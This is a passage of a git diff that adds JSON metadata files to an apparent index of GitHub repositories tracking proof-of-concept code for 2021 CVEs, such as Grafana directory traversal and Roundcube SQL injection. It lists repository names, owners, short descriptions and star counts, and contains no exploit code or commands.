"public" + }, + "html_url": "https:\/\/github.com\/katseyres2\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2023-10-26T14:21:49Z", + "updated_at": "2023-10-26T14:23:31Z", + "pushed_at": "2023-10-26T14:23:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721589713, + "name": "CVE-2021-43798", + "full_name": "Iris288\/CVE-2021-43798", + "owner": { + "login": "Iris288", + "id": 101178777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101178777?v=4", + "html_url": "https:\/\/github.com\/Iris288", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Iris288\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2023-11-21T11:24:54Z", + "updated_at": "2023-11-21T11:24:54Z", + "pushed_at": "2023-11-21T11:28:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734375970, + "name": "CVE-2021-43798", + "full_name": "wagneralves\/CVE-2021-43798", + "owner": { + "login": "wagneralves", + "id": 5523049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5523049?v=4", + "html_url": "https:\/\/github.com\/wagneralves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wagneralves\/CVE-2021-43798", + "description": "Directory Traversal and Arbitrary File Read on Grafana", + "fork": false, + "created_at": "2023-12-21T14:24:53Z", + "updated_at": "2023-12-21T15:44:04Z", + "pushed_at": "2023-12-21T15:08:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767120196, + "name": "CVE-2021-43798-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2021-43798-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-43798-EXPLOIT", + "description": "A PoC exploit for CVE-2021-43798 - Grafana Directory Traversal", + "fork": false, + "created_at": "2024-03-04T18:32:21Z", + "updated_at": "2024-09-13T08:59:18Z", + "pushed_at": "2024-03-04T21:20:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43789", + "directory-traversal", + "directory-traversal-vulnerability", + "exploitation", + "exploits", + "grafana", + "hacking", + "information-disclosure", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778520336, + "name": "CVE-2021-43798", + "full_name": "ticofookfook\/CVE-2021-43798", + "owner": { + "login": "ticofookfook", + "id": 99700348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4", + "html_url": "https:\/\/github.com\/ticofookfook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2024-03-27T21:47:06Z", + "updated_at": "2024-03-27T21:57:13Z", + "pushed_at": "2024-03-27T22:02:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791503372, + "name": "CVE-2021-43798", + "full_name": "topyagyuu\/CVE-2021-43798", + "owner": { + "login": "topyagyuu", + "id": 167684629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167684629?v=4", + "html_url": "https:\/\/github.com\/topyagyuu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/topyagyuu\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2024-04-24T20:47:29Z", + "updated_at": "2024-10-04T11:36:59Z", + "pushed_at": "2024-04-26T11:36:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817530776, + "name": "CVE-2021-43798", + "full_name": "MalekAlthubiany\/CVE-2021-43798", + "owner": { + "login": "MalekAlthubiany", + "id": 127455300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127455300?v=4", + "html_url": "https:\/\/github.com\/MalekAlthubiany", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalekAlthubiany\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2024-06-19T23:27:01Z", + "updated_at": "2024-06-20T04:11:01Z", + "pushed_at": "2024-06-20T04:10:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823003815, + "name": "Grafana-Decryptor-for-CVE-2021-43798", + "full_name": "Sic4rio\/Grafana-Decryptor-for-CVE-2021-43798", + "owner": { + "login": "Sic4rio", + "id": 75425513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75425513?v=4", + "html_url": "https:\/\/github.com\/Sic4rio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sic4rio\/Grafana-Decryptor-for-CVE-2021-43798", + "description": "Grafana Decryptor for CVE-2021-43798", + "fork": false, + "created_at": "2024-07-02T08:43:45Z", + "updated_at": "2024-07-02T09:00:01Z", + "pushed_at": "2024-07-02T08:45:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cracking", + "cve-2021-43798", + "decryption", + "decryptor", + "grafana", + "password" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868207969, + "name": "Grafana-CVE-2021-43798", + "full_name": "0xSAZZAD\/Grafana-CVE-2021-43798", + "owner": { + "login": "0xSAZZAD", + "id": 59094087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59094087?v=4", + "html_url": "https:\/\/github.com\/0xSAZZAD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xSAZZAD\/Grafana-CVE-2021-43798", + "description": "Python implementation of a tool for decrypting and encrypting sensitive data in Grafana, specifically addressing the vulnerabilities associated with CVE-2021-43798. Grafana encrypts all data source passwords using the AES algorithm with the secret_key found in the defaults.ini configuration file.", + "fork": false, + "created_at": "2024-10-05T18:51:12Z", + "updated_at": "2024-10-08T07:47:37Z", + "pushed_at": "2024-10-05T19:49:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43799.json b/2021/CVE-2021-43799.json new file mode 100644 index 0000000000..42fb7dbac8 --- /dev/null +++ b/2021/CVE-2021-43799.json @@ -0,0 +1,33 @@ +[ + { + "id": 436070129, + "name": "CVE-2021-43799", + "full_name": "scopion\/CVE-2021-43799", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2021-43799", + "description": "Python Exploit Code ", + "fork": false, + "created_at": "2021-12-08T00:47:00Z", + "updated_at": "2024-08-12T20:18:39Z", + "pushed_at": "2021-12-08T00:40:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43811.json b/2021/CVE-2021-43811.json new file mode 100644 index 0000000000..5cf88e5436 --- /dev/null +++ b/2021/CVE-2021-43811.json @@ -0,0 +1,40 @@ +[ + { + "id": 527150878, + "name": "CVE-2021-43811", + "full_name": "s-index\/CVE-2021-43811", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2021-43811", + "description": "awslabs\/sockeye Code injection via unsafe YAML loading CVE-2021-43811", + "fork": false, + "created_at": "2022-08-21T08:44:31Z", + "updated_at": "2024-08-12T20:26:22Z", + "pushed_at": "2022-08-21T09:30:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "awslabs", + "code-injection", + "cve-2021-43811", + "poc", + "sockeye", + "unsafe-yaml-load" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43821.json b/2021/CVE-2021-43821.json new file mode 100644 index 0000000000..4b5c8ade3d --- /dev/null +++ b/2021/CVE-2021-43821.json @@ -0,0 +1,33 @@ +[ + { + "id": 441849792, + "name": "opencast-CVE-2021-43821-env", + "full_name": "Jackey0\/opencast-CVE-2021-43821-env", + "owner": { + "login": "Jackey0", + "id": 52018740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52018740?v=4", + "html_url": "https:\/\/github.com\/Jackey0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jackey0\/opencast-CVE-2021-43821-env", + "description": "opencast cve-2021-43821敏感信息泄露漏洞环境", + "fork": false, + "created_at": "2021-12-26T09:04:43Z", + "updated_at": "2021-12-27T12:18:04Z", + "pushed_at": "2021-12-27T07:42:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43848.json b/2021/CVE-2021-43848.json new file mode 100644 index 0000000000..1dc8cb167d --- /dev/null +++ b/2021/CVE-2021-43848.json @@ -0,0 +1,33 @@ +[ + { + "id": 455242168, + "name": "hui2ochko", + "full_name": "neex\/hui2ochko", + "owner": { + "login": "neex", + "id": 684237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684237?v=4", + "html_url": "https:\/\/github.com\/neex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neex\/hui2ochko", + "description": "exploit for CVE-2021-43848", + "fork": false, + "created_at": "2022-02-03T16:31:13Z", + "updated_at": "2024-02-18T11:39:00Z", + "pushed_at": "2022-02-03T16:36:55Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43857.json b/2021/CVE-2021-43857.json new file mode 100644 index 0000000000..f8fe63b8a1 --- /dev/null +++ b/2021/CVE-2021-43857.json @@ -0,0 +1,33 @@ +[ + { + "id": 485594121, + "name": "CVE-2021-43857", + "full_name": "lowkey0808\/CVE-2021-43857", + "owner": { + "login": "lowkey0808", + "id": 49674960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4", + "html_url": "https:\/\/github.com\/lowkey0808", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lowkey0808\/CVE-2021-43857", + "description": "CVE-2021-43857(gerapy命令执行)", + "fork": false, + "created_at": "2022-04-26T01:38:06Z", + "updated_at": "2022-04-28T02:08:14Z", + "pushed_at": "2022-04-26T01:53:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43858.json b/2021/CVE-2021-43858.json new file mode 100644 index 0000000000..76152681d9 --- /dev/null +++ b/2021/CVE-2021-43858.json @@ -0,0 +1,33 @@ +[ + { + "id": 626802613, + "name": "CVE-2021-43858-MinIO", + "full_name": "khuntor\/CVE-2021-43858-MinIO", + "owner": { + "login": "khuntor", + "id": 25006917, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25006917?v=4", + "html_url": "https:\/\/github.com\/khuntor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khuntor\/CVE-2021-43858-MinIO", + "description": null, + "fork": false, + "created_at": "2023-04-12T07:34:03Z", + "updated_at": "2023-04-12T07:35:27Z", + "pushed_at": "2023-04-12T07:38:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43883.json b/2021/CVE-2021-43883.json new file mode 100644 index 0000000000..16e3edc871 --- /dev/null +++ b/2021/CVE-2021-43883.json @@ -0,0 +1,39 @@ +[ + { + "id": 434345250, + "name": "shakeitoff", + "full_name": "jbaines-r7\/shakeitoff", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/shakeitoff", + "description": "Windows MSI Installer LPE (CVE-2021-43883)", + "fork": false, + "created_at": "2021-12-02T19:15:59Z", + "updated_at": "2024-09-14T22:03:29Z", + "pushed_at": "2021-12-17T12:53:51Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41379", + "cve-2021-43883", + "exploit", + "lpe", + "windows" + ], + "visibility": "public", + "forks": 18, + "watchers": 76, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43891.json b/2021/CVE-2021-43891.json new file mode 100644 index 0000000000..199be61ce9 --- /dev/null +++ b/2021/CVE-2021-43891.json @@ -0,0 +1,33 @@ +[ + { + "id": 440311834, + "name": "code-wsl-rce", + "full_name": "parsiya\/code-wsl-rce", + "owner": { + "login": "parsiya", + "id": 3981231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3981231?v=4", + "html_url": "https:\/\/github.com\/parsiya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/parsiya\/code-wsl-rce", + "description": "Proof of Concept for CVE-2021-43891", + "fork": false, + "created_at": "2021-12-20T21:30:51Z", + "updated_at": "2022-06-29T10:46:22Z", + "pushed_at": "2021-12-27T17:00:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43893.json b/2021/CVE-2021-43893.json new file mode 100644 index 0000000000..d85d537d64 --- /dev/null +++ b/2021/CVE-2021-43893.json @@ -0,0 +1,38 @@ +[ + { + "id": 455631614, + "name": "blankspace", + "full_name": "jbaines-r7\/blankspace", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/blankspace", + "description": "Proof of Concept for EFSRPC Arbitrary File Upload (CVE-2021-43893)", + "fork": false, + "created_at": "2022-02-04T17:11:00Z", + "updated_at": "2024-08-12T20:20:20Z", + "pushed_at": "2022-02-14T14:26:26Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43893", + "exploit", + "poc", + "windows" + ], + "visibility": "public", + "forks": 14, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43908.json b/2021/CVE-2021-43908.json new file mode 100644 index 0000000000..d931b49d2d --- /dev/null +++ b/2021/CVE-2021-43908.json @@ -0,0 +1,33 @@ +[ + { + "id": 523963941, + "name": "vscode-rce-electrovolt", + "full_name": "Sudistark\/vscode-rce-electrovolt", + "owner": { + "login": "Sudistark", + "id": 31372554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4", + "html_url": "https:\/\/github.com\/Sudistark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sudistark\/vscode-rce-electrovolt", + "description": "Trying to reproduce CVE-2021-43908", + "fork": false, + "created_at": "2022-08-12T05:18:43Z", + "updated_at": "2024-01-17T03:16:39Z", + "pushed_at": "2022-08-14T12:01:31Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43936.json b/2021/CVE-2021-43936.json new file mode 100644 index 0000000000..51fdfa5f73 --- /dev/null +++ b/2021/CVE-2021-43936.json @@ -0,0 +1,33 @@ +[ + { + "id": 437671075, + "name": "CVE-2021-43936", + "full_name": "LongWayHomie\/CVE-2021-43936", + "owner": { + "login": "LongWayHomie", + "id": 63229183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4", + "html_url": "https:\/\/github.com\/LongWayHomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2021-43936", + "description": "CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.", + "fork": false, + "created_at": "2021-12-12T22:31:00Z", + "updated_at": "2024-10-05T14:11:18Z", + "pushed_at": "2022-03-29T11:41:00Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44026.json b/2021/CVE-2021-44026.json new file mode 100644 index 0000000000..850737da09 --- /dev/null +++ b/2021/CVE-2021-44026.json @@ -0,0 +1,33 @@ +[ + { + "id": 718579909, + "name": "roundcube-cve-2021-44026", + "full_name": "pentesttoolscom\/roundcube-cve-2021-44026", + "owner": { + "login": "pentesttoolscom", + "id": 101269191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101269191?v=4", + "html_url": "https:\/\/github.com\/pentesttoolscom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentesttoolscom\/roundcube-cve-2021-44026", + "description": "A demo exploit for CVE-2021-44026, a SQL injection in Roundcube", + "fork": false, + "created_at": "2023-11-14T11:32:36Z", + "updated_at": "2024-11-25T08:29:47Z", + "pushed_at": "2023-12-22T11:29:43Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44077.json b/2021/CVE-2021-44077.json new file mode 100644 index 0000000000..884f16aae0 --- /dev/null +++ b/2021/CVE-2021-44077.json @@ -0,0 +1,64 @@ +[ + { + "id": 436382060, + "name": "CVE-2021-44077", + "full_name": "horizon3ai\/CVE-2021-44077", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-44077", + "description": "Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077", + "fork": false, + "created_at": "2021-12-08T20:24:38Z", + "updated_at": "2024-11-03T19:39:05Z", + "pushed_at": "2021-12-08T21:43:16Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 543157100, + "name": "Golang-CVE-2021-44077-POC", + "full_name": "pizza-power\/Golang-CVE-2021-44077-POC", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/Golang-CVE-2021-44077-POC", + "description": "Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306", + "fork": false, + "created_at": "2022-09-29T14:07:54Z", + "updated_at": "2023-04-03T07:59:57Z", + "pushed_at": "2022-10-02T19:35:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44103.json b/2021/CVE-2021-44103.json new file mode 100644 index 0000000000..9433168396 --- /dev/null +++ b/2021/CVE-2021-44103.json @@ -0,0 +1,33 @@ +[ + { + "id": 552445695, + "name": "CVE-2021-44103", + "full_name": "paulotrindadec\/CVE-2021-44103", + "owner": { + "login": "paulotrindadec", + "id": 94475244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94475244?v=4", + "html_url": "https:\/\/github.com\/paulotrindadec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paulotrindadec\/CVE-2021-44103", + "description": null, + "fork": false, + "created_at": "2022-10-16T16:02:47Z", + "updated_at": "2024-01-22T19:06:04Z", + "pushed_at": "2022-10-16T18:12:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44117.json b/2021/CVE-2021-44117.json new file mode 100644 index 0000000000..cc605b9253 --- /dev/null +++ b/2021/CVE-2021-44117.json @@ -0,0 +1,33 @@ +[ + { + "id": 474547570, + "name": "CVE-2021-44117", + "full_name": "warmachine-57\/CVE-2021-44117", + "owner": { + "login": "warmachine-57", + "id": 51786945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51786945?v=4", + "html_url": "https:\/\/github.com\/warmachine-57", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/warmachine-57\/CVE-2021-44117", + "description": null, + "fork": false, + "created_at": "2022-03-27T05:50:34Z", + "updated_at": "2022-03-27T05:50:34Z", + "pushed_at": "2022-06-10T08:30:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44132.json b/2021/CVE-2021-44132.json new file mode 100644 index 0000000000..0e6b891afc --- /dev/null +++ b/2021/CVE-2021-44132.json @@ -0,0 +1,33 @@ +[ + { + "id": 463667316, + "name": "CVE-2021-44132", + "full_name": "exploitwritter\/CVE-2021-44132", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2021-44132", + "description": "This script exploits a vulnerability in the OMCISHELL object for C-DATA proprietary routers such as BESTCOMs.", + "fork": false, + "created_at": "2022-02-25T20:30:05Z", + "updated_at": "2022-03-08T02:55:07Z", + "pushed_at": "2022-02-25T20:31:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44142.json b/2021/CVE-2021-44142.json new file mode 100644 index 0000000000..3434822a02 --- /dev/null +++ b/2021/CVE-2021-44142.json @@ -0,0 +1,95 @@ +[ + { + "id": 475550985, + "name": "Samba-CVE-2021-44142", + "full_name": "hrsman\/Samba-CVE-2021-44142", + "owner": { + "login": "hrsman", + "id": 102617131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102617131?v=4", + "html_url": "https:\/\/github.com\/hrsman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hrsman\/Samba-CVE-2021-44142", + "description": null, + "fork": false, + "created_at": "2022-03-29T17:32:25Z", + "updated_at": "2022-03-29T18:25:12Z", + "pushed_at": "2022-03-29T20:43:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475582400, + "name": "CVE-2021-44142", + "full_name": "horizon3ai\/CVE-2021-44142", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-44142", + "description": null, + "fork": false, + "created_at": "2022-03-29T19:03:38Z", + "updated_at": "2024-08-12T20:21:58Z", + "pushed_at": "2022-03-29T20:47:13Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 484298524, + "name": "CVE-2021-44142", + "full_name": "gudyrmik\/CVE-2021-44142", + "owner": { + "login": "gudyrmik", + "id": 60119377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60119377?v=4", + "html_url": "https:\/\/github.com\/gudyrmik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gudyrmik\/CVE-2021-44142", + "description": null, + "fork": false, + "created_at": "2022-04-22T04:46:54Z", + "updated_at": "2022-04-27T07:32:26Z", + "pushed_at": "2022-04-25T01:02:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44168.json b/2021/CVE-2021-44168.json new file mode 100644 index 0000000000..fab34e54da --- /dev/null +++ b/2021/CVE-2021-44168.json @@ -0,0 +1,33 @@ +[ + { + "id": 598975692, + "name": "CVE-2021-44168", + "full_name": "0xhaggis\/CVE-2021-44168", + "owner": { + "login": "0xhaggis", + "id": 6735009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4", + "html_url": "https:\/\/github.com\/0xhaggis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2021-44168", + "description": "A download of code without integrity check vulnerability in the \"execute restore src-vis\" command of FortiOS before 7.0.3.", + "fork": false, + "created_at": "2023-02-08T07:30:52Z", + "updated_at": "2024-11-14T23:09:52Z", + "pushed_at": "2023-10-18T17:15:55Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + 